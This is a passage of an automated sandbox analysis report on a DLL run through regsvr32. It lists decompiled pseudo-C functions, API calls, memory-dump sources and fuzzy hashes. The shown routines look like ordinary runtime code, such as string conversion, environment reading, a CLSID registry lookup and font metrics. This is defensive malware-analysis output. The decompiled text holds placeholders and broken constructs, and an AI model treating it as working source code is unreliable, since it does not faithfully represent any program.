                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F323
                                                                                                              • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F335
                                                                                                            • GetDesktopWindow.USER32 ref: 1001F362
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001F370
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 1001F37F
                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 1001F40E
                                                                                                            • GetActiveWindow.USER32 ref: 1001F419
                                                                                                            • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F427
                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 1001F443
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 833315621-0
                                                                                                            • Opcode ID: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction ID: 07bae71fa05b1da8482edcdebb19160d7d4844d0efed804ca524429d20d1f7a4
                                                                                                            • Opcode Fuzzy Hash: 36a7553cafaefb879fb01c6852922989da2301ce548023a2a0f367a123b38a93
                                                                                                            • Instruction Fuzzy Hash: D14190359007199FDB12DFA5C889BBEB7F5FF14751F10011DF102AA1A2CB74AA81CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                                                            				intOrPtr _t54;
                                                                                                            				int _t56;
                                                                                                            				char* _t57;
                                                                                                            				int _t68;
                                                                                                            				char* _t69;
                                                                                                            				int _t70;
                                                                                                            				int _t73;
                                                                                                            				void* _t77;
                                                                                                            				int _t81;
                                                                                                            				short* _t82;
                                                                                                            				void* _t97;
                                                                                                            				short* _t98;
                                                                                                            
                                                                                                            				_t94 = __esi;
                                                                                                            				_push(0x38);
                                                                                                            				_push(0x10042f10);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t54 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
                                                                                                            				 *(_t97 - 0x34) = 0;
                                                                                                            				 *(_t97 - 0x44) = 0;
                                                                                                            				_t81 =  *( *(_t97 + 0x14));
                                                                                                            				 *(_t97 - 0x40) = _t81;
                                                                                                            				 *(_t97 - 0x3c) = 0;
                                                                                                            				_t56 =  *(_t97 + 8);
                                                                                                            				if(_t56 ==  *(_t97 + 0xc)) {
                                                                                                            					_t82 =  *(_t97 - 0x48);
                                                                                                            					goto L31;
                                                                                                            				} else {
                                                                                                            					_t85 = _t97 - 0x30;
                                                                                                            					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
                                                                                                            						 *(_t97 - 0x3c) = 1;
                                                                                                            					}
                                                                                                            					if( *(_t97 - 0x3c) == 0) {
                                                                                                            						_t94 =  *(_t97 - 0x38);
                                                                                                            					} else {
                                                                                                            						if(_t81 == 0xffffffff) {
                                                                                                            							_t77 = E10011820( *(_t97 + 0x10));
                                                                                                            							_pop(_t85);
                                                                                                            							_t94 = _t77 + 1;
                                                                                                            							__eflags = _t94;
                                                                                                            						} else {
                                                                                                            							_t94 = _t81;
                                                                                                            						}
                                                                                                            						 *(_t97 - 0x38) = _t94;
                                                                                                            					}
                                                                                                            					if( *(_t97 - 0x3c) != 0) {
                                                                                                            						L14:
                                                                                                            						 *(_t97 - 4) = 0;
                                                                                                            						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
                                                                                                            						 *(_t97 - 0x18) = _t98;
                                                                                                            						_t82 = _t98;
                                                                                                            						 *(_t97 - 0x48) = _t82;
                                                                                                            						E10011C50(_t82, 0, _t94 + _t94);
                                                                                                            						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
                                                                                                            						_t111 = _t82;
                                                                                                            						if(_t82 != 0) {
                                                                                                            							L19:
                                                                                                            							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
                                                                                                            							__eflags = _t68;
                                                                                                            							if(_t68 == 0) {
                                                                                                            								L31:
                                                                                                            								__eflags =  *(_t97 - 0x44);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t82);
                                                                                                            									E100107C8(_t82, 0, _t94, __eflags);
                                                                                                            								}
                                                                                                            								_t57 =  *(_t97 - 0x34);
                                                                                                            								goto L34;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t97 + 0x18);
                                                                                                            							if( *(_t97 + 0x18) == 0) {
                                                                                                            								__eflags =  *(_t97 - 0x3c);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									L25:
                                                                                                            									_push(_t94);
                                                                                                            									_push(1);
                                                                                                            									_t69 = E1001382A(_t82, 0, _t94, __eflags);
                                                                                                            									 *(_t97 - 0x34) = _t69;
                                                                                                            									__eflags = _t69;
                                                                                                            									if(_t69 != 0) {
                                                                                                            										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
                                                                                                            										__eflags = _t70;
                                                                                                            										if(__eflags != 0) {
                                                                                                            											__eflags =  *(_t97 - 0x40) - 0xffffffff;
                                                                                                            											if( *(_t97 - 0x40) != 0xffffffff) {
                                                                                                            												 *( *(_t97 + 0x14)) = _t70;
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											_push( *(_t97 - 0x34));
                                                                                                            											E100107C8(_t82, 0, _t94, __eflags);
                                                                                                            											 *(_t97 - 0x34) = 0;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
                                                                                                            								__eflags = _t94;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								goto L25;
                                                                                                            							}
                                                                                                            							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
                                                                                                            							__eflags = _t73;
                                                                                                            							if(_t73 != 0) {
                                                                                                            								 *(_t97 - 0x34) =  *(_t97 + 0x18);
                                                                                                            							}
                                                                                                            							goto L31;
                                                                                                            						} else {
                                                                                                            							_push(_t94);
                                                                                                            							_push(2);
                                                                                                            							_t82 = E1001382A(_t82, 0, _t94, _t111);
                                                                                                            							if(_t82 != 0) {
                                                                                                            								 *(_t97 - 0x44) = 1;
                                                                                                            								goto L19;
                                                                                                            							}
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
                                                                                                            						 *(_t97 - 0x38) = _t94;
                                                                                                            						if(_t94 == 0) {
                                                                                                            							L17:
                                                                                                            							_t57 = 0;
                                                                                                            							L34:
                                                                                                            							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
                                                                                                            						}
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
                                                                                                            • _strlen.LIBCMT ref: 1001A4FC
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info$ByteCharMultiWide_strlen
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 1335377746-2766943729
                                                                                                            • Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
                                                                                                            • Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
                                                                                                            • Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 98%
                                                                                                            			E1001666B() {
                                                                                                            				int _v4;
                                                                                                            				int _v8;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t7;
                                                                                                            				CHAR* _t8;
                                                                                                            				WCHAR* _t16;
                                                                                                            				int _t19;
                                                                                                            				char* _t23;
                                                                                                            				int _t24;
                                                                                                            				long _t28;
                                                                                                            				int _t29;
                                                                                                            				void* _t34;
                                                                                                            				intOrPtr _t35;
                                                                                                            				WCHAR* _t36;
                                                                                                            				CHAR* _t37;
                                                                                                            				intOrPtr _t38;
                                                                                                            				int _t40;
                                                                                                            
                                                                                                            				_t7 =  *0x1004f700; // 0x1
                                                                                                            				_t29 = 0;
                                                                                                            				_t36 = 0;
                                                                                                            				_t38 = 2;
                                                                                                            				if(_t7 != 0) {
                                                                                                            					L6:
                                                                                                            					__eflags = _t7 - 1;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						__eflags = _t7 - _t38;
                                                                                                            						if(_t7 == _t38) {
                                                                                                            							L21:
                                                                                                            							_t8 = GetEnvironmentStrings();
                                                                                                            							_t37 = _t8;
                                                                                                            							__eflags = _t37 - _t29;
                                                                                                            							if(_t37 == _t29) {
                                                                                                            								L20:
                                                                                                            								return 0;
                                                                                                            							}
                                                                                                            							__eflags =  *_t37 - _t29;
                                                                                                            							if( *_t37 == _t29) {
                                                                                                            								L25:
                                                                                                            								_t39 = _t8 - _t37 + 1;
                                                                                                            								_t34 = E100107B6(_t8 - _t37 + 1);
                                                                                                            								__eflags = _t34 - _t29;
                                                                                                            								if(_t34 != _t29) {
                                                                                                            									E10011440(_t34, _t37, _t39);
                                                                                                            								} else {
                                                                                                            									_t34 = 0;
                                                                                                            								}
                                                                                                            								FreeEnvironmentStringsA(_t37);
                                                                                                            								return _t34;
                                                                                                            							} else {
                                                                                                            								goto L23;
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								do {
                                                                                                            									L23:
                                                                                                            									_t8 =  &(_t8[1]);
                                                                                                            									__eflags =  *_t8 - _t29;
                                                                                                            								} while ( *_t8 != _t29);
                                                                                                            								_t8 =  &(_t8[1]);
                                                                                                            								__eflags =  *_t8 - _t29;
                                                                                                            							} while ( *_t8 != _t29);
                                                                                                            							goto L25;
                                                                                                            						}
                                                                                                            						__eflags = _t7 - _t29;
                                                                                                            						if(_t7 == _t29) {
                                                                                                            							goto L21;
                                                                                                            						}
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					L7:
                                                                                                            					if(_t36 != _t29) {
                                                                                                            						L9:
                                                                                                            						_t16 = _t36;
                                                                                                            						if( *_t36 == _t29) {
                                                                                                            							L12:
                                                                                                            							_t35 = __imp__WideCharToMultiByte; // 0x76ec6840
                                                                                                            							_t19 = (_t16 - _t36 >> 1) + 1;
                                                                                                            							_v4 = _t19;
                                                                                                            							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
                                                                                                            							if(_t40 != _t29) {
                                                                                                            								_t23 = E100107B6(_t40);
                                                                                                            								_v8 = _t23;
                                                                                                            								if(_t23 != _t29) {
                                                                                                            									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
                                                                                                            									_t52 = _t24;
                                                                                                            									if(_t24 == 0) {
                                                                                                            										_push(_v8);
                                                                                                            										E100107C8(_t29, _t35, _t36, _t52);
                                                                                                            										_v8 = _t29;
                                                                                                            									}
                                                                                                            									_t29 = _v8;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							FreeEnvironmentStringsW(_t36);
                                                                                                            							return _t29;
                                                                                                            						} else {
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							do {
                                                                                                            								L10:
                                                                                                            								_t16 = _t16 + _t38;
                                                                                                            							} while ( *_t16 != _t29);
                                                                                                            							_t16 = _t16 + _t38;
                                                                                                            						} while ( *_t16 != _t29);
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					_t36 = GetEnvironmentStringsW();
                                                                                                            					if(_t36 == _t29) {
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				_t36 = GetEnvironmentStringsW();
                                                                                                            				if(_t36 == 0) {
                                                                                                            					_t28 = GetLastError();
                                                                                                            					__eflags = _t28 - 0x78;
                                                                                                            					if(_t28 != 0x78) {
                                                                                                            						_t7 =  *0x1004f700; // 0x1
                                                                                                            					} else {
                                                                                                            						_t7 = _t38;
                                                                                                            						 *0x1004f700 = _t7;
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					 *0x1004f700 = 1;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            			}
























                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                            • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 883850110-4125583295
                                                                                                            • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                                                            • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002583A(void* _a4, intOrPtr _a8) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				int _v16;
                                                                                                            				char* _v20;
                                                                                                            				int _v24;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed int _t35;
                                                                                                            				void* _t37;
                                                                                                            				void* _t42;
                                                                                                            				int* _t43;
                                                                                                            
                                                                                                            				_t43 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_v20 = E100017D0(_a8, 0x104);
                                                                                                            				_v16 = 0x104;
                                                                                                            				_t42 = RegOpenKeyA;
                                                                                                            				_v24 = 0;
                                                                                                            				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                                                                                                            					_push(_t37);
                                                                                                            					_v8 = 0;
                                                                                                            					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                                                            						_a4 = 0;
                                                                                                            						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                                                            							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
                                                                                                            							asm("sbb esi, esi");
                                                                                                            							_t43 =  ~_t35 + 1;
                                                                                                            							RegCloseKey(_a4);
                                                                                                            						}
                                                                                                            						RegCloseKey(_v8);
                                                                                                            					}
                                                                                                            					RegCloseKey(_v12);
                                                                                                            					_pop(_t37);
                                                                                                            				}
                                                                                                            				E10006CE2(_t37, _a8, _t42, 0xffffffff);
                                                                                                            				return _t43;
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                            • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                            • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$QueryValue
                                                                                                            • String ID: CLSID$InProcServer32
                                                                                                            • API String ID: 3523390698-323508013
                                                                                                            • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                                                            • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036531() {
                                                                                                            				struct HWND__* _v4;
                                                                                                            				void* _v68;
                                                                                                            				void* _v76;
                                                                                                            				int _t4;
                                                                                                            				int _t10;
                                                                                                            				struct HDC__* _t15;
                                                                                                            				void* _t18;
                                                                                                            
                                                                                                            				_t4 =  *0x1004b8cc; // 0xffffffff
                                                                                                            				if(_t4 == 0xffffffff) {
                                                                                                            					_t15 = GetDC(0);
                                                                                                            					_v4 = 0;
                                                                                                            					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                                                            					if(_t18 != 0) {
                                                                                                            						_v68 = SelectObject(_t15, _t18);
                                                                                                            					}
                                                                                                            					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
                                                                                                            					if(_t18 != 0) {
                                                                                                            						SelectObject(_t15, _v76);
                                                                                                            						DeleteObject(_t18);
                                                                                                            					}
                                                                                                            					ReleaseDC(0, _t15);
                                                                                                            					_t10 =  *0x1004b8cc; // 0xffffffff
                                                                                                            					return _t10;
                                                                                                            				}
                                                                                                            				return _t4;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 10036543
                                                                                                            • GetSystemMetrics.USER32 ref: 10036567
                                                                                                            • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                                                            • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                                                            • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                                                            • ReleaseDC.USER32 ref: 100365AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                            • String ID: Marlett
                                                                                                            • API String ID: 1397664628-3688754224
                                                                                                            • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                                                            • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E1003982F(void* __ecx) {
                                                                                                            				intOrPtr _t52;
                                                                                                            				intOrPtr _t53;
                                                                                                            				void* _t57;
                                                                                                            				CHAR* _t60;
                                                                                                            				CHAR* _t88;
                                                                                                            				CHAR* _t89;
                                                                                                            				void* _t102;
                                                                                                            				CHAR* _t103;
                                                                                                            				CHAR* _t105;
                                                                                                            				CHAR* _t106;
                                                                                                            				CHAR* _t107;
                                                                                                            				void* _t111;
                                                                                                            				short* _t112;
                                                                                                            				void* _t122;
                                                                                                            				void* _t127;
                                                                                                            				void* _t129;
                                                                                                            				void* _t131;
                                                                                                            
                                                                                                            				_t127 = _t129 - 0x8c;
                                                                                                            				_t52 =  *0x1004c470; // 0xf3933a06
                                                                                                            				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
                                                                                                            				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
                                                                                                            				_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
                                                                                                            				E10011C50(_t112, 0, 0x20);
                                                                                                            				_t103 =  *(_t127 + 0x98);
                                                                                                            				_t131 = _t129 - 0x10c + 0xc;
                                                                                                            				_t109 = _t103;
                                                                                                            				 *(_t127 - 0x80) = _t127 - 0x78;
                                                                                                            				if(E100244DE(_t103, 0x100410f8) == 0) {
                                                                                                            					_t109 = _t103;
                                                                                                            					_t57 = E100244DE(_t103, 0x1003d114);
                                                                                                            					_push(0x100);
                                                                                                            					_push(_t127 - 0x78);
                                                                                                            					if(_t57 == 0) {
                                                                                                            						_push(0xf108);
                                                                                                            						E100245D3();
                                                                                                            						 *_t112 = 0xf108;
                                                                                                            						L12:
                                                                                                            						_t60 = 0;
                                                                                                            						if( *(_t127 - 0x80) == 0) {
                                                                                                            							L14:
                                                                                                            							__imp__#2(_t60);
                                                                                                            							 *(_t112 + 8) = _t60;
                                                                                                            							if( *(_t112 + 4) == 0) {
                                                                                                            								_t106 =  *(E100373B5() + 0x10);
                                                                                                            								if(_t106 != 0) {
                                                                                                            									_t115 = lstrlenA(_t106) + 1;
                                                                                                            									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            									_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            								} else {
                                                                                                            									_t60 = 0;
                                                                                                            								}
                                                                                                            								__imp__#2(_t60);
                                                                                                            								 *(_t112 + 4) = _t60;
                                                                                                            							}
                                                                                                            							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
                                                                                                            								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
                                                                                                            								if(_t105 != 0) {
                                                                                                            									_t126 = lstrlenA(_t105) + 1;
                                                                                                            									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            								} else {
                                                                                                            									_t60 = 0;
                                                                                                            								}
                                                                                                            								__imp__#2(_t60);
                                                                                                            								 *(_t112 + 0xc) = _t60;
                                                                                                            							}
                                                                                                            							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
                                                                                                            						}
                                                                                                            						L13:
                                                                                                            						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
                                                                                                            						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            					_push(0xf10a);
                                                                                                            					E100245D3();
                                                                                                            					 *_t112 = 0xf10a;
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            				 *(_t127 - 0x80) = _t103[0xc];
                                                                                                            				 *_t112 = _t103[8];
                                                                                                            				 *(_t112 + 0x10) = _t103[0x10];
